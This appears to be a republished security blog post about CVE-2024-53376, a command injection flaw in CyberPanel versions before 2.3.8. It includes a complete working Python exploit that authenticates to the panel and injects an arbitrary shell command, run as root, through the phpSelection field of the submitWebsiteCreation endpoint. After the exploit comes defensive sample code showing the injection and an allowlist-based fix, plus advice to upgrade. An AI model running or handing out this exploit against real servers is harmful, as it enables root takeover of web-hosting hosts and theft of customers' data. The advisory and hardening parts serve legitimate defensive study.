Security researcher Thanatos tested the vulnerability against CyberPanel 2.3.7 and showed that it allows executing commands anywhere on the system and writing files as root. If the attacker can reach the CyberPanel installation folder, they can go on to extract sensitive data, which makes the flaw even more serious.
A proof of concept (PoC) for CVE-2024-53376 has been published on GitHub.
The impact of CVE-2024-53376 is severe. Successful exploitation can lead to:
- **Root privileges**: commands run as root, giving the attacker full control of the affected host.
- **Data exfiltration**: with access to the CyberPanel installation folder, sensitive data can be pulled out directly through the web panel.
- **Compromised infrastructure**: a web-hosting server running a vulnerable CyberPanel version becomes a pivot for further attacks, putting hosted sites and customer data at risk.
CyberPanel fixed this vulnerability in version 2.3.8. All users are strongly advised to upgrade to that version or later immediately. Note that the PoC below needs valid panel credentials; the flaw is an authenticated command injection, so weak or reused panel passwords raise the exposure of unpatched hosts.
PoC:
https://github.com/ThottySploity/CVE-2024-53376
```python
#!/usr/bin/python3
# CVE-2024-53376
# Exploit Title: CyberPanel - Authenticated Remote Code Execution (RCE)
# Exploit Author: Ryan Putman
# Technical Details: https://github.com/ThottySploity/CVE-2024-53376
# Date: 2024-12-15
# Vendor Homepage: https://cyberpanel.net
# Tested On: Cyberpanel < 2.3.8
# Vulnerability Description:
#   Command injection vulnerability in the submitWebsiteCreation endpoint

import argparse, requests, json
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disabling the SSL errors (since CyberPanel runs on a self signed cert)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

arg_parser = argparse.ArgumentParser()
# The target is used as a base URL, so it must carry the scheme and port,
# e.g. https://panel.example:8090
arg_parser.add_argument('-t', metavar='target', help='base URL of the CyberPanel panel, e.g. https://host:8090', required=True)
arg_parser.add_argument('-u', metavar='username', required=True)
arg_parser.add_argument('-p', metavar='password', required=True)
arg_parser.add_argument('-c', metavar='cmd', default='id > /tmp/rce #', help='command to execute')
args = arg_parser.parse_args()

# Obtaining the CSRF token used for authentication
csrf_token = requests.get(args.t, verify=False).headers.get('Set-Cookie').split(';')[0]
if len(csrf_token) > 0:
    print(f"[+] Obtained the following CSRFTOKEN: {csrf_token}")

payload = {
    "username": args.u,
    "password": args.p,
    "languageSelection": "english",
}

headers = {
    'Cookie': csrf_token,
    'Accept': 'application/json',
    'X-Csrftoken': csrf_token.replace('csrftoken=', ''),
    'Origin': 'https://localhost:8090',
    'Referer': 'https://localhost:8090/',
    'Connection': 'close'
}

# Obtaining the sessionId used for authorization.
sessionId = requests.post(
    "{}/verifyLogin".format(args.t),
    headers=headers,
    data=json.dumps(payload),
    verify=False,
).headers.get('Set-Cookie').split(';')[1].replace(" Path=/, ", "")
if len(sessionId) > 0:
    print(f"[+] Obtained the following sessionId: {sessionId}")

exploitHeaders = {
    'Cookie': f'{csrf_token}; django_language=en; {sessionId}',
    'Accept': 'application/json',
    'X-Csrftoken': csrf_token.replace('csrftoken=', ''),
    'Origin': 'https://localhost:8090',
    'Referer': 'https://localhost:8090/',
    'Connection': 'close'
}

# phpSelection is interpolated into a shell command on the server; the
# closing quote ends the intended argument and "#" comments out the rest.
exploitPayload = {
    "package": "Default",
    "domainName": "cyberpanel.net",
    "adminEmail": "[email protected]",
    "phpSelection": f"PHP 8.0'; {args.c}; #",
    "ssl": 0,
    "websiteOwner": "admin",
    "dkimCheck": 0,
    "openBasedir": 0,
    "mailDomain": 0,
    "apacheBackend": 0,
}

# Sending the exploit to the vulnerable endpoint (note the OPTIONS method)
exploitRequest = requests.options(
    f"{args.t}/websites/submitWebsiteCreation",
    headers=exploitHeaders,
    data=json.dumps(exploitPayload),
    verify=False,
)
if exploitRequest.status_code == 200:
    print("[+] Exploit succeeded")
    print(f"[+] Executed: {args.c}")
```
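The PoC works because the `phpSelection` field ends up inside a shell command string. The following added example (written for this page; it is not CyberPanel's code and the `createWebsite` script path, the allowed version list and the `build_command_*` helpers are placeholders) shows how `/bin/sh` tokenises such a string when the PoC's payload is interpolated, and a hardened variant that refuses anything outside an allowlist and passes the value as a single argv element instead of a shell string.

```python
import shlex

# Constructed payload, shaped like the PoC's phpSelection value.
INJECTED = "PHP 8.0'; id > /tmp/rce; #"
LEGIT = "PHP 8.0"

# Hypothetical allowlist of selectable PHP versions (assumption, not CyberPanel's list).
ALLOWED_PHP = {"PHP 7.4", "PHP 8.0", "PHP 8.1", "PHP 8.2", "PHP 8.3"}

# Placeholder path for the helper the panel would invoke.
CREATE_SCRIPT = "/usr/local/example/createWebsite"


def build_command_unsafe(php_selection: str) -> str:
    """Anti-pattern: request data interpolated into a shell string.

    Wrapping the value in single quotes does not help, because the attacker
    simply supplies the closing quote themselves.
    """
    return f"{CREATE_SCRIPT} --php '{php_selection}'"


def shell_commands(cmd: str) -> list[list[str]]:
    """Tokenise `cmd` the way a POSIX shell would and split it on ';'.

    Returns one argv list per command, so an injected payload shows up as
    more than one command.
    """
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True          # '#' starts a comment, as in sh
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def is_allowed_php(php_selection: str) -> bool:
    """Strict allowlist check; anything not an exact known value is rejected."""
    return php_selection in ALLOWED_PHP


def build_command_safe(php_selection: str) -> list[str]:
    """Hardened variant: validate, then build argv for subprocess with shell=False.

    The value travels as one argument and is never parsed by a shell, so
    quotes, ';' and '#' have no special meaning.
    """
    if not is_allowed_php(php_selection):
        raise ValueError(f"rejected phpSelection: {php_selection!r}")
    return [CREATE_SCRIPT, "--php", php_selection]


if __name__ == "__main__":
    for value in (LEGIT, INJECTED):
        print("shell string :", build_command_unsafe(value))
        print("sh would run :", shell_commands(build_command_unsafe(value)))
        try:
            print("safe argv    :", build_command_safe(value))
        except ValueError as err:
            print("safe argv    : REJECTED -", err)
```

Running the script shows the legitimate value producing a single command, while the injected value splits into two (`createWebsite --php 'PHP 8.0'` followed by `id > /tmp/rce`) and is refused by the hardened path. The same allowlist check is a reasonable thing to log on the server side: any `phpSelection` that fails it is an exploitation attempt, not a user mistake.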
Originally published on the WeChat public account 棉花糖fans: CVE-2024-53376: CyberPanel RCE PoC released
Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site accepts none. Questions can be sent by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).